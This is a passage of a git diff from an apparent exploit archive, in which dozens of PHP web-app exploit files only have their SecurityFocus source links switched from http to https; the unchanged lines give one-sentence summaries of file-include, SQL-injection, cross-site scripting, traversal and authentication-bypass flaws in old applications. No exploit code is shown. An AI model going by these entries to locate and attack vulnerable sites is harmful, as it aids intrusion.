to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28437.txt b/exploits/php/webapps/28437.txt index a30519d5c..aa8e35548 100644 --- a/exploits/php/webapps/28437.txt +++ b/exploits/php/webapps/28437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19725/info +source: https://www.securityfocus.com/bid/19725/info The Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28439.txt b/exploits/php/webapps/28439.txt index 34ab8c184..1adb86936 100644 --- a/exploits/php/webapps/28439.txt +++ b/exploits/php/webapps/28439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19745/info +source: https://www.securityfocus.com/bid/19745/info HLstats is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28440.txt b/exploits/php/webapps/28440.txt index 99ede602c..64a230609 100644 --- a/exploits/php/webapps/28440.txt +++ b/exploits/php/webapps/28440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19754/info +source: https://www.securityfocus.com/bid/19754/info ModuleBased CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28441.txt b/exploits/php/webapps/28441.txt index 78aa3ac4f..09a5164b2 100644 --- a/exploits/php/webapps/28441.txt +++ b/exploits/php/webapps/28441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19757/info +source: https://www.securityfocus.com/bid/19757/info IwebNegar is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28442.txt b/exploits/php/webapps/28442.txt index 36db58b68..cd3589cf1 100644 --- a/exploits/php/webapps/28442.txt +++ b/exploits/php/webapps/28442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19763/info +source: https://www.securityfocus.com/bid/19763/info LinksCaffe is prone to an authentication-bypass vulnerability because of a lack of required authentication on the application's administrative script. An attacker can use administrative functions simply by knowing the script's name and location. diff --git a/exploits/php/webapps/28444.txt b/exploits/php/webapps/28444.txt index 23d9c6dac..b14be609e 100644 --- a/exploits/php/webapps/28444.txt +++ b/exploits/php/webapps/28444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19769/info +source: https://www.securityfocus.com/bid/19769/info AlstraSoft Template Seller is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28446.txt b/exploits/php/webapps/28446.txt index 9e00dd859..edea6c772 100644 --- a/exploits/php/webapps/28446.txt +++ b/exploits/php/webapps/28446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19771/info +source: https://www.securityfocus.com/bid/19771/info HLstats is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28447.php b/exploits/php/webapps/28447.php index f9535b688..b2711db4c 100644 --- a/exploits/php/webapps/28447.php +++ b/exploits/php/webapps/28447.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19774/info +source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28453.txt b/exploits/php/webapps/28453.txt index c7fd8395c..375df7b1e 100644 --- a/exploits/php/webapps/28453.txt +++ b/exploits/php/webapps/28453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28454.txt b/exploits/php/webapps/28454.txt index 86c645d5a..5fba36f5d 100644 --- a/exploits/php/webapps/28454.txt +++ b/exploits/php/webapps/28454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28455.txt b/exploits/php/webapps/28455.txt index 8098e8960..e03bf5e1e 100644 --- a/exploits/php/webapps/28455.txt +++ b/exploits/php/webapps/28455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28456.txt b/exploits/php/webapps/28456.txt index 7996b3061..3ad6530da 100644 --- a/exploits/php/webapps/28456.txt +++ b/exploits/php/webapps/28456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28457.txt b/exploits/php/webapps/28457.txt index 2c17aa03c..fb7122134 100644 --- a/exploits/php/webapps/28457.txt +++ b/exploits/php/webapps/28457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28458.txt b/exploits/php/webapps/28458.txt index ad95870aa..32fad2eed 100644 --- a/exploits/php/webapps/28458.txt +++ b/exploits/php/webapps/28458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28459.txt b/exploits/php/webapps/28459.txt index d6e0bf1d4..6f19ed25d 100644 --- a/exploits/php/webapps/28459.txt +++ b/exploits/php/webapps/28459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28460.txt b/exploits/php/webapps/28460.txt index e2f75c5d8..c3860e4a1 100644 --- a/exploits/php/webapps/28460.txt +++ b/exploits/php/webapps/28460.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28461.txt b/exploits/php/webapps/28461.txt index f7b1a32fa..b2aeae591 100644 --- a/exploits/php/webapps/28461.txt +++ b/exploits/php/webapps/28461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28462.txt b/exploits/php/webapps/28462.txt index 22ae26aba..32f4d375c 100644 --- a/exploits/php/webapps/28462.txt +++ b/exploits/php/webapps/28462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19776/info +source: https://www.securityfocus.com/bid/19776/info ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28464.txt b/exploits/php/webapps/28464.txt index ba7507d78..3cc20f828 100644 --- a/exploits/php/webapps/28464.txt +++ b/exploits/php/webapps/28464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19777/info +source: https://www.securityfocus.com/bid/19777/info ezContents is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28465.txt b/exploits/php/webapps/28465.txt index 058ded63b..ee765e736 100644 --- a/exploits/php/webapps/28465.txt +++ b/exploits/php/webapps/28465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19780/info +source: https://www.securityfocus.com/bid/19780/info ezContents is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/php/webapps/28466.txt b/exploits/php/webapps/28466.txt index d87fe110a..fba9f91d5 100644 --- a/exploits/php/webapps/28466.txt +++ b/exploits/php/webapps/28466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19781/info +source: https://www.securityfocus.com/bid/19781/info Learn.com learncenter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28467.txt b/exploits/php/webapps/28467.txt index 53337a9ca..fc0b694cd 100644 --- a/exploits/php/webapps/28467.txt +++ b/exploits/php/webapps/28467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19787/info +source: https://www.securityfocus.com/bid/19787/info ExBB is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28468.txt b/exploits/php/webapps/28468.txt index 7ae46db23..add566025 100644 --- a/exploits/php/webapps/28468.txt +++ b/exploits/php/webapps/28468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19799/info +source: https://www.securityfocus.com/bid/19799/info YACS is prone multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28470.txt b/exploits/php/webapps/28470.txt index 02d5ba981..b9041e5d0 100644 --- a/exploits/php/webapps/28470.txt +++ b/exploits/php/webapps/28470.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19803/info +source: https://www.securityfocus.com/bid/19803/info VBZooM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28471.txt b/exploits/php/webapps/28471.txt index 08a4f4084..3419331d1 100644 --- a/exploits/php/webapps/28471.txt +++ b/exploits/php/webapps/28471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19806/info +source: https://www.securityfocus.com/bid/19806/info ToendaCMS is prone a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28472.txt b/exploits/php/webapps/28472.txt index 60337bc4c..2879eb2fa 100644 --- a/exploits/php/webapps/28472.txt +++ b/exploits/php/webapps/28472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19807/info +source: https://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28473.txt b/exploits/php/webapps/28473.txt index 4504238fb..3d0b65fda 100644 --- a/exploits/php/webapps/28473.txt +++ b/exploits/php/webapps/28473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19813/info +source: https://www.securityfocus.com/bid/19813/info Autentificator is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28486.txt b/exploits/php/webapps/28486.txt index 68dfb6a58..c326353c6 100644 --- a/exploits/php/webapps/28486.txt +++ b/exploits/php/webapps/28486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19824/info +source: https://www.securityfocus.com/bid/19824/info In-portal In-link is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28487.txt b/exploits/php/webapps/28487.txt index fbc6efb74..9f8a3ea6c 100644 --- a/exploits/php/webapps/28487.txt +++ b/exploits/php/webapps/28487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19825/info +source: https://www.securityfocus.com/bid/19825/info PHP-Nuke MyHeadlines module is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28488.php b/exploits/php/webapps/28488.php index bd3120ee2..9db86fbe0 100644 --- a/exploits/php/webapps/28488.php +++ b/exploits/php/webapps/28488.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19840/info +source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28490.txt b/exploits/php/webapps/28490.txt index b8215ff90..595451a87 100644 --- a/exploits/php/webapps/28490.txt +++ b/exploits/php/webapps/28490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19847/info +source: https://www.securityfocus.com/bid/19847/info SoftBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28492.txt b/exploits/php/webapps/28492.txt index c97b28e1b..14921b7ee 100644 --- a/exploits/php/webapps/28492.txt +++ b/exploits/php/webapps/28492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19880/info +source: https://www.securityfocus.com/bid/19880/info Uni-vert PhpLeague is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28493.txt b/exploits/php/webapps/28493.txt index 43bb32f57..9dd23df56 100644 --- a/exploits/php/webapps/28493.txt +++ b/exploits/php/webapps/28493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19890/info +source: https://www.securityfocus.com/bid/19890/info The Book Catalog module for PHP-Nuke is prone to a vulnerability that lets attackers upload arbitrary files. diff --git a/exploits/php/webapps/28494.txt b/exploits/php/webapps/28494.txt index 62b173225..f19dcd04c 100644 --- a/exploits/php/webapps/28494.txt +++ b/exploits/php/webapps/28494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19894/info +source: https://www.securityfocus.com/bid/19894/info AckerTodo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28495.txt b/exploits/php/webapps/28495.txt index 5a178abc6..b762ebe9f 100644 --- a/exploits/php/webapps/28495.txt +++ b/exploits/php/webapps/28495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19907/info +source: https://www.securityfocus.com/bid/19907/info Twiki is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28496.php b/exploits/php/webapps/28496.php index eafdc3131..2ee9edad0 100644 --- a/exploits/php/webapps/28496.php +++ b/exploits/php/webapps/28496.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19908/info +source: https://www.securityfocus.com/bid/19908/info PHP-Fusion is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28497.txt b/exploits/php/webapps/28497.txt index 67dc6301d..172c57f3a 100644 --- a/exploits/php/webapps/28497.txt +++ b/exploits/php/webapps/28497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19916/info +source: https://www.securityfocus.com/bid/19916/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28498.txt b/exploits/php/webapps/28498.txt index bdc6952b8..00c2ac2c2 100644 --- a/exploits/php/webapps/28498.txt +++ b/exploits/php/webapps/28498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19916/info +source: https://www.securityfocus.com/bid/19916/info Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28499.txt b/exploits/php/webapps/28499.txt index 5c43010d5..ec1f044b7 100644 --- a/exploits/php/webapps/28499.txt +++ b/exploits/php/webapps/28499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19919/info +source: https://www.securityfocus.com/bid/19919/info Viking board is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28502.txt b/exploits/php/webapps/28502.txt index bf1dfe974..a3e6d63a0 100644 --- a/exploits/php/webapps/28502.txt +++ b/exploits/php/webapps/28502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19932/info +source: https://www.securityfocus.com/bid/19932/info TextAds is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28503.txt b/exploits/php/webapps/28503.txt index e50f5acbf..b9537a1ac 100644 --- a/exploits/php/webapps/28503.txt +++ b/exploits/php/webapps/28503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19932/info +source: https://www.securityfocus.com/bid/19932/info TextAds is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28505.txt b/exploits/php/webapps/28505.txt index 057ab4b6e..a06ff06fd 100644 --- a/exploits/php/webapps/28505.txt +++ b/exploits/php/webapps/28505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19942/info +source: https://www.securityfocus.com/bid/19942/info PHProg is prone to multiple input-validation vulnerabilities because the application fails to sanitize user-supplied input. These issues include a cross-site scripting vulnerability and a local file-include vulnerability. diff --git a/exploits/php/webapps/28509.txt b/exploits/php/webapps/28509.txt index b389e8de5..28ff26207 100644 --- a/exploits/php/webapps/28509.txt +++ b/exploits/php/webapps/28509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19948/info +source: https://www.securityfocus.com/bid/19948/info XHP CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28510.txt b/exploits/php/webapps/28510.txt index 5dea97ecd..1adec8376 100644 --- a/exploits/php/webapps/28510.txt +++ b/exploits/php/webapps/28510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19957/info +source: https://www.securityfocus.com/bid/19957/info PHProg is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and local file-include attacks. diff --git a/exploits/php/webapps/28511.txt b/exploits/php/webapps/28511.txt index 820946d70..af0dae495 100644 --- a/exploits/php/webapps/28511.txt +++ b/exploits/php/webapps/28511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19957/info +source: https://www.securityfocus.com/bid/19957/info PHProg is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and local file-include attacks. diff --git a/exploits/php/webapps/28515.txt b/exploits/php/webapps/28515.txt index b9ed23c95..bcaa912d5 100644 --- a/exploits/php/webapps/28515.txt +++ b/exploits/php/webapps/28515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28516.txt b/exploits/php/webapps/28516.txt index 8dfce1493..d5a152a8b 100644 --- a/exploits/php/webapps/28516.txt +++ b/exploits/php/webapps/28516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28517.txt b/exploits/php/webapps/28517.txt index 2fbc9aee8..a2344fa4d 100644 --- a/exploits/php/webapps/28517.txt +++ b/exploits/php/webapps/28517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19963/info +source: https://www.securityfocus.com/bid/19963/info IDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user supplied data. diff --git a/exploits/php/webapps/28518.txt b/exploits/php/webapps/28518.txt index bc2bfa5f7..ae2341087 100644 --- a/exploits/php/webapps/28518.txt +++ b/exploits/php/webapps/28518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19964/info +source: https://www.securityfocus.com/bid/19964/info IDevSupport iSupport is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28519.txt b/exploits/php/webapps/28519.txt index 13acce2a6..d1092dd51 100644 --- a/exploits/php/webapps/28519.txt +++ b/exploits/php/webapps/28519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19968/info +source: https://www.securityfocus.com/bid/19968/info WM-News is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28520.txt b/exploits/php/webapps/28520.txt index 62940b820..37cf6fce6 100644 --- a/exploits/php/webapps/28520.txt +++ b/exploits/php/webapps/28520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19972/info +source: https://www.securityfocus.com/bid/19972/info Ractive Popper is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28522.txt b/exploits/php/webapps/28522.txt index 613b0c9c0..4f1dcb2f8 100644 --- a/exploits/php/webapps/28522.txt +++ b/exploits/php/webapps/28522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28523.txt b/exploits/php/webapps/28523.txt index d4c432214..e8cb9f6c1 100644 --- a/exploits/php/webapps/28523.txt +++ b/exploits/php/webapps/28523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28524.txt b/exploits/php/webapps/28524.txt index 833317469..b5aac0dc9 100644 --- a/exploits/php/webapps/28524.txt +++ b/exploits/php/webapps/28524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28525.txt b/exploits/php/webapps/28525.txt index 309201d75..3a895efec 100644 --- a/exploits/php/webapps/28525.txt +++ b/exploits/php/webapps/28525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28526.txt b/exploits/php/webapps/28526.txt index e49896e74..8f1685fdc 100644 --- a/exploits/php/webapps/28526.txt +++ b/exploits/php/webapps/28526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28527.txt b/exploits/php/webapps/28527.txt index 33da4b9bf..28314ff4d 100644 --- a/exploits/php/webapps/28527.txt +++ b/exploits/php/webapps/28527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28528.txt b/exploits/php/webapps/28528.txt index 7b624958d..aabbceec8 100644 --- a/exploits/php/webapps/28528.txt +++ b/exploits/php/webapps/28528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28529.txt b/exploits/php/webapps/28529.txt index 0ff4447c7..c2d0ef6bc 100644 --- a/exploits/php/webapps/28529.txt +++ b/exploits/php/webapps/28529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28530.txt b/exploits/php/webapps/28530.txt index 0d7bfa22e..943bba5de 100644 --- a/exploits/php/webapps/28530.txt +++ b/exploits/php/webapps/28530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28531.txt b/exploits/php/webapps/28531.txt index 65076e0da..7bb779194 100644 --- a/exploits/php/webapps/28531.txt +++ b/exploits/php/webapps/28531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28532.txt b/exploits/php/webapps/28532.txt index 5694d5970..28d45291c 100644 --- a/exploits/php/webapps/28532.txt +++ b/exploits/php/webapps/28532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28533.txt b/exploits/php/webapps/28533.txt index 904531ba3..a250be08e 100644 --- a/exploits/php/webapps/28533.txt +++ b/exploits/php/webapps/28533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28534.txt b/exploits/php/webapps/28534.txt index ca963dbd4..69bfd2e1d 100644 --- a/exploits/php/webapps/28534.txt +++ b/exploits/php/webapps/28534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28535.txt b/exploits/php/webapps/28535.txt index eabe9224b..59dd46ed9 100644 --- a/exploits/php/webapps/28535.txt +++ b/exploits/php/webapps/28535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28536.txt b/exploits/php/webapps/28536.txt index d5b4d83c0..b9c18bae5 100644 --- a/exploits/php/webapps/28536.txt +++ b/exploits/php/webapps/28536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28537.txt b/exploits/php/webapps/28537.txt index de1c1a1e9..12ea05fee 100644 --- a/exploits/php/webapps/28537.txt +++ b/exploits/php/webapps/28537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28538.txt b/exploits/php/webapps/28538.txt index cf0fdfd12..426d5bea0 100644 --- a/exploits/php/webapps/28538.txt +++ b/exploits/php/webapps/28538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28539.txt b/exploits/php/webapps/28539.txt index f3741f069..5122eea75 100644 --- a/exploits/php/webapps/28539.txt +++ b/exploits/php/webapps/28539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28540.txt b/exploits/php/webapps/28540.txt index dc3e129d4..d40510e20 100644 --- a/exploits/php/webapps/28540.txt +++ b/exploits/php/webapps/28540.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28541.txt b/exploits/php/webapps/28541.txt index e3edb147c..6e804267b 100644 --- a/exploits/php/webapps/28541.txt +++ b/exploits/php/webapps/28541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19977/info +source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28543.txt b/exploits/php/webapps/28543.txt index 4c11855db..997a4aeb8 100644 --- a/exploits/php/webapps/28543.txt +++ b/exploits/php/webapps/28543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19992/info +source: https://www.securityfocus.com/bid/19992/info ForumJBC is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28544.txt b/exploits/php/webapps/28544.txt index 697685e80..ec70903d8 100644 --- a/exploits/php/webapps/28544.txt +++ b/exploits/php/webapps/28544.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19994/info +source: https://www.securityfocus.com/bid/19994/info k2News Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28545.txt b/exploits/php/webapps/28545.txt index d1dd0ad45..5ccb02fdd 100644 